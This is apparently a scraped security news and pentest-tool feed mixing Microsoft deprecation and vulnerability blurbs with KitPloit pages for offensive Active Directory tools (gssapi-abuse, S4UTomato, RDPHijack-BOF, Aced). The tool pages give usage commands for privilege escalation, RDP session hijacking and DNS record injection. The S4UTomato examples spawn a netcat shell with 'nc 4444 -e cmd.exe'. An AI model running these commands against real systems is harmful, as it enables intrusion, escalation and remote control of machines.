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The End of an Era: Microsoft Phases Out VBScript for JavaScript and PowerShell

By: Newsroom β€” May 23rd 2024 at 05:33
Microsoft on Wednesday outlined its plans to deprecate Visual Basic Script (VBScript) in the second half of 2024 in favor of more advanced alternatives such as JavaScript and PowerShell. "Technology has advanced over the years, giving rise to more powerful and versatile scripting languages such as JavaScript and PowerShell," Microsoft Program Manager Naveen Shankar said. "These languages
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Windows 11 to Deprecate NTLM, Add AI-Powered App Controls and Security Defenses

By: Newsroom β€” May 21st 2024 at 09:02
 Microsoft on Monday confirmed its plans to deprecate NT LAN Manager (NTLM) in Windows 11 in the second half of the year, as it announced a slew of new security measures to harden the widely-used desktop operating system. "Deprecating NTLM has been a huge ask from our security community as it will strengthen user authentication, and deprecation is planned in the second half of 2024," the
☐ β˜† βœ‡ KitPloit - PenTest Tools!

Gssapi-Abuse - A Tool For Enumerating Potential Hosts That Are Open To GSSAPI Abuse Within Active Directory Networks

By: Zion3R β€” January 20th 2024 at 11:30

gssapi-abuse was released as part of my DEF CON 31 talk. A full write up on the abuse vector can be found here: A Broken Marriage: Abusing Mixed Vendor Kerberos Stacks

The tool has two features. The first is the ability to enumerate non Windows hosts that are joined to Active Directory that offer GSSAPI authentication over SSH.

The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.


gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.


On Windows hosts, the MIT Kerberos software should be installed in addition to the python modules listed in requirements.txt, this can be obtained at the MIT Kerberos Distribution Page. Windows krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf


The libkrb5-dev package needs to be installed prior to installing python requirements


Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool

pip install -r requirements.txt

Enumeration Mode

The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.

Once the list of non Windows machines has been obtained, gssapi-abuse will then attempt to connect to each host over SSH and determine if GSSAPI based authentication is permitted.


python .\ -d enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host does not have GSSAPI enabled over SSH, ignoring
[+] Host has GSSAPI enabled over SSH

DNS Mode

DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently dns mode relies on a working krb5 configuration with a valid TGT or DNS service ticket targetting a specific domain controller, e.g. DNS/dc1.victim.local.


Adding a DNS A record for host

python .\ -d dns -t ahost -a add --type A --data
[+] Successfully authenticated to DNS server
[=] Adding A record for target ahost using data
[+] Applied 1 updates successfully

Adding a reverse PTR record for host Notice that the data argument is terminated with a ., this is important or the record becomes a relative record to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones to A records.

python .\ -d dns --zone -t 50 -a add --type PTR --data
[+] Successfully authenticated to DNS server
[=] Adding PTR record for target 50 using data
[+] Applied 1 updates successfully

Forward and reverse DNS lookup results after execution




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Hackers Can Exploit 'Forced Authentication' to Steal Windows NTLM Tokens

By: Newsroom β€” November 28th 2023 at 10:23
Cybersecurity researchers have discovered a case of "forced authentication" that could be exploited to leak a Windows user's NT LAN Manager (NTLM) tokens by tricking a victim into opening a specially crafted Microsoft Access file. The attack takes advantage of a legitimate feature in the database management system solution that allows users to link to external data sources, such as a remote
☐ β˜† βœ‡ KitPloit - PenTest Tools!

S4UTomato - Escalate Service Account To LocalSystem Via Kerberos

By: Zion3R β€” October 7th 2023 at 11:30

Escalate Service Account To LocalSystem via Kerberos.

Traditional Potatoes

Friends familiar with the "Potato" series of privilege escalation should know that it can elevate service account privileges to local system privileges. The early exploitation techniques of "Potato" are almost identical: leveraging certain features of COM interfaces, deceiving the NT AUTHORITY\SYSTEM account to connect and authenticate to an attacker-controlled RPC server. Then, through a series of API calls, an intermediary (NTLM Relay) attack is executed during this authentication process, resulting in the generation of an access token for the NT AUTHORITY\SYSTEM account on the local system. Finally, this token is stolen, and the CreatePr ocessWithToken() or CreateProcessAsUser() function is used to pass the token and create a new process to obtain SYSTEM privileges.

How About Kerberos

In any scenario where a machine is joined to a domain, you can leverage the aforementioned techniques for local privilege escalation as long as you can run code under the context of a Windows service account or a Microsoft virtual account, provided that the Active Directory hasn't been hardened to fully defend against such attacks.

In a Windows domain environment, SYSTEM, NT AUTHORITY\NETWORK SERVICE, and Microsoft virtual accounts are used for authentication by system computer accounts that are joined to the domain. Understanding this is crucial because in modern versions of Windows, most Windows services run by default using Microsoft virtual accounts. Notably, IIS and MSSQL use these virtual accounts, and I believe other applications might also employ them. Therefore, we can abuse the S4U extension to obtain the service ticket for the domain administrator account "Administrator" on the local machine. Then, with the help of James Forshaw (@tiraniddo)'s SCMUACBypass, we can use that ticket to create a system service and ga in SYSTEM privileges. This achieves the same effect as traditional methods used in the "Potato" family of privilege escalation techniques.

Before this, we need to obtain a TGT (Ticket Granting Ticket) for the local machine account. This is not easy because of the restrictions imposed by service account permissions, preventing us from obtaining the computer's Long-term Key and thus being unable to construct a KRB_AS_REQ request. To accomplish the aforementioned goal, I leveraged three techniques: Resource-based Constrained Delegation, Shadow Credentials, and Tgtdeleg. I built my project based on the Rubeus toolset.

How to Use and Examples

domain controller or LDAP server. -m, --ComputerName The new computer account to create. -p, --ComputerPassword The password of the new computer account to be created. -f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer object. -c, --Command Program to run. -v, --Verbose Output verbose debug information. --help Display this help screen. --version Display version information." dir="auto">
C:\Users\whoami\Desktop>S4UTomato.exe --help

S4UTomato 1.0.0-beta
Copyright (c) 2023

-d, --Domain Domain (FQDN) to authenticate to.
-s, --Server Host name of domain controller or LDAP server.
-m, --ComputerName The new computer account to create.
-p, --ComputerPassword The password of the new computer account to be created.
-f, --Force Forcefully update the 'msDS-KeyCredentialLink' attribute of the computer
-c, --Command Program to run.
-v, --Verbose Output verbose debug information.
--help Display this help screen.
--version Display version information.

LEP via Resource-based Constrained Delegation

S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 4444 -e cmd.exe"

LEP via Shadow Credentials + S4U2self

S4UTomato.exe shadowcred -c "nc 4444 -e cmd.exe" -f

LEP via Tgtdeleg + S4U2self

# First retrieve the TGT through Tgtdeleg
S4UTomato.exe tgtdeleg
# Then run SCMUACBypass to obtain SYSTEM privilege
S4UTomato.exe krbscm -c "nc 4444 -e cmd.exe"

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Microsoft Reclassifies SPNEGO Extended Negotiation Security Vulnerability as 'Critical'

By: Ravie Lakshmanan β€” December 15th 2022 at 13:42
Microsoft has revised the severity of a security vulnerability it originallyΒ patched in September 2022, upgrading it to "Critical" after it emerged that it could be exploited to achieve remote code execution. Tracked asΒ CVE-2022-37958Β (CVSS score: 8.1), the flaw was previously described as anΒ information disclosure vulnerabilityΒ in SPNEGO Extended Negotiation (NEGOEX) Security Mechanism. SPNEGO,
☐ β˜† βœ‡ KitPloit - PenTest Tools!

RDPHijack-BOF - Cobalt Strike Beacon Object File (BOF) That Uses WinStationConnect API To Perform Local/Remote RDP Session Hijacking

By: (Unknown) β€” November 9th 2022 at 11:45

Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking. With a valid access token / kerberos ticket (e.g., golden ticket) of the session owner, you will be able to hijack the session remotely without dropping any beacon/tool on the target server.

To enumerate sessions locally/remotely, you could use Quser-BOF.


Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]

Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server that you want to perform RDP hijacking.

Sample usage
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2

Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password P@ssw0rd123

Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal





☐ β˜† βœ‡ KitPloit - PenTest Tools!

Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL

By: (Unknown) β€” September 2nd 2022 at 12:30

Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.

Use case?

I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.


Thanks to the below for all the code I stole:


└─# python3 -h                             

|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |

Parse and log a target principal's DACL.

usage: [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.


In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.

And here's how that data looks when transformed by bofhound and ingested into BloodHound.
